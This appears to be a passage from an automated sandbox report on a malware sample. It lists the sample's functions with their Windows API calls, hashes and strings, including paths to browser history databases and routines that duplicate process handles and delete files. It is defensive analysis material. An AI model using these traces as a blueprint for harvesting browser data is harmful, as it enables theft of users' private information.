                                                                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                              • API String ID: 2887208581-2114579845
                                                                                                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 3473537107-0
                                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                              • API String ID: 2221118986-1725073988
                                                                                                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@DeleteObject
                                                                                                              • String ID: r!A
                                                                                                              • API String ID: 1103273653-628097481
                                                                                                              • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                              • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1033339047-0
                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$memcmp
                                                                                                              • String ID: $$8
                                                                                                              • API String ID: 2808797137-435121686
                                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1979745280-0
                                                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                              • free.MSVCRT ref: 00418803
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1355100292-0
                                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                              • String ID: history.dat$places.sqlite
                                                                                                              • API String ID: 2641622041-467022611
                                                                                                              • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                              • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 839530781-0
                                                                                                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID: *.*$index.dat
                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 1156039329-0
                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 3397143404-0
                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1125800050-0
                                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                              Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                              • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleSleep
                                                                                                              • String ID: }A
                                                                                                              • API String ID: 252777609-2138825249
                                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                              Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                              Memory Dump Source
